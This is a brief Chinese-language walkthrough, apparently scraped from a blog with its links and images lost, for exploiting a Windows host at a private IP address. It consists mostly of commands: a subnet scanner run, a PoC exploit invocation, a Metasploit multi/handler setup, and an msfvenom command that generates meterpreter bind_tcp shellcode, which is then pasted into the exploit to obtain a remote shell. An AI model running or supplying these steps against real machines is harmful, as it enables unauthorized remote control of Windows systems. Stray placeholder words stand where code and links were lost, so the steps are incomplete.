環境準備:python
漏洞檢測工具下載地址:git
pythone3 scanner.py 192.168.0.0/24
PoC下載地址:shell
python3.8 exploit.py -ip 192.168.201.132
一、先對使用 kali 對 9999 端口進行監聽:tcp
msfconsole use exploit/multi/handler set payload windows/x64/meterpreter/bind_tcp set lport 9999 set rhost 192.168.201.132 run
二、kali 使用 msf 生成木馬(此處端口需跟監聽的端口是一致的)工具
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=9999 -b '\x00' -i 1 -f python>test.py
木馬生成後的內容爲:
code
下載好的 POC:
blog
三、先把木馬的內的 buf 替換爲 USER_PAYLOAD ,再替換 exploit.py 內的 USER_PAYLOAD 行的內容圖片
四、使用 Python3 運行(在此處需按一次回車)
五、此時監聽的 9999 端口已收到訪反彈的 shell